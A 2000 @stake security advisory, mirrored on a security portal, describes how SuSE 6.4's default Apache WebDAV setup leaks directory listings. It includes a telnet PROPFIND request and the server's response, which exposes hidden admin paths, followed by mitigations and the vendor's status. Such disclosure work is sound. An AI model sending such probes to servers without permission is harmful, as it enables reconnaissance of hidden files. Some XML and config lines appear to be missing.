[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : SuSE Apache WebDAV Directory Listings (A090700-3)

Title: SuSE Apache WebDAV Directory Listings (A090700-3)
Released by: @stake
Date: 7th September 2000
Printable version: Click here 
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1





                               @stake Inc.

                            www.atstake.com

                       www.cerberus-infosec.co.uk



                           Security Advisory





Advisory Name: SuSE Apache WebDAV Directory Listings (A090700-3)

 Release Date: 09/07/2000

  Application: Apache 1.3.12

     Platform: SuSE Linux 6.4

     Severity: Attackers are able to retrieve directory listings

       Author: mnemonix (dlitchfield@atstake.com)

Vendor Status: Vendor has updated Apache package

          Web: www.atstake.com/research/advisories/2000/a090700-3.txt





Overview:  



WebDAV (Web Distributed Authoring and Versioning) is an extention to the

HTTP (Hypertext Transfer Protocol) 1.1 protocol, the protocol that drives

the Web, and is discussed in RFC 2518

(http://ftp.isi.edu/in-notes/rfc2518.txt). Essentially WebDAV exists to

allow users to create, edit and share documents over the Internet or

Intranets using the HTTP protocol. To facilitate this new REQUEST METHODS

have been added on top of the standard GET, POST and HEAD methods such as

PROPFIND, PROPATCH, MKCOL, COPY, DELETE,and PUT.  Detailed Description:

One of these, PROPFIND is of interest, as far as this particular issue is

concerned anyway. PROPFIND exists to allow users to search for certain

properties of resources such as the displayname, when last modified etc,

etc.  The Apache web server as installed by SuSE 6.4 has WebDAV "turned

on". By making a request to the web server similar to the following it is

possible to gain what amounts to a directory listing:



suse~: # telnet 127.0.0.1 80

Trying 127.0.0.1...

Connected to 127.0.0.1.

Escape character is '^]'.

PROPFIND / HTTP/1.1

Host: suse

Content-Type: text/xml

Content-Length: 110







 

  

 





HTTP/1.1 207 Multi-Status

Date: Sun, 20 Aug 2000 17:38:58 GMT

Server: Apache/1.3.12 (Unix)  (SuSE/Linux) mod_fastcgi/2.2.2 DAV/0.9.14

mod_perl/1.21 PHP/3.0.15

Transfer-Encoding: chunked

Content-Type: text/xml; charset="utf-8"



dc1







/secret/secret/sql_tool.html







HTTP/1.1 200 OK







/secret/secret/change-passwd.html







HTTP/1.1 200 OK







/secret/secret/add-user.shmtl







HTTP/1.1 200 OK







/secret/secret/







HTTP/1.1 200 OK







/secret/







HTTP/1.1 200 OK







/webalizer/







HTTP/1.1 200 OK







/test.php3







HTTP/1.1 200 OK







/date.php3







HTTP/1.1 200 OK







/linbot/







HTTP/1.1 200 OK







/robots.txt







HTTP/1.1 200 OK







/index.html







HTTP/1.1 200 OK







/gif/u_arrow.gif







..

- ---cut-----



What are the security ramifications of this? As can be seen by looking at

the server's response one can see a directory called /secret/secret/ with

three files stored there called sql_tool.html, add-user.html and

change-passwd.html. These pages exist for administration purposes and

there are no links to these pages from the site. To be able to access them

a user needs to know of their existence - a poor method of access control

- - but one which is quite common. Further to this it would be possible to

look for files that may have been left by developers, such as test.html

or script.cgi.old, which often allow greater access than their production

version equivalents or due to a .old or .bak file extention are not

executed but access to the source can be gained.





Solution:



If you want to leave WebDAV enabled for some directories open

httpd.conf in your text editor of choice, e.g. pico or vi and add the

following for each directory you want to enable WebDAV for:





#add other directives as needed such as Order allow,deny



DAV On







Stop and restart Apache.





If you want to simply turn WebDAV off: Open up httpd.conf and find





DAV On





and change "On" to "Off". By default there is only one directory with the

IfDefine DAV directive, namely "/usr/local/httpd/htdocs". If other

directories have been given this directive change these too. Stop and

restart Apache.



If you want to Apache to start without the WebDAV module then edit

/etc/rc.d/rc3.d/S20apache and place a "#"  in front of the line that reads



test -e /usr/lib/apache/libdav.so && MODULES="-D DAV $MODULES"



By doing this when Apache is next started this module will not be

included.





Vendor Response:



SuSE have updated their Apache package and more information is available

from http://www.suse.de/de/support/security/





For more advisories: http://www.atstake.com/research/index.html

PGP Key: http://www.atstake.com/research/pgp_key.asc



Copyright 2000 @stake, Inc. All rights reserved.













-----BEGIN PGP SIGNATURE-----

Version: PGP 6.5.8



iQA/AwUBObe8plESXwDtLdMhEQLV7gCgoxc7U9OU+SHtcV4DqndE5VG7DLgAoNyA

GLL7pLekKvTSgd5BJO8NikgK

=pBZF

-----END PGP SIGNATURE-----






(C) 1999-2000 All rights reserved.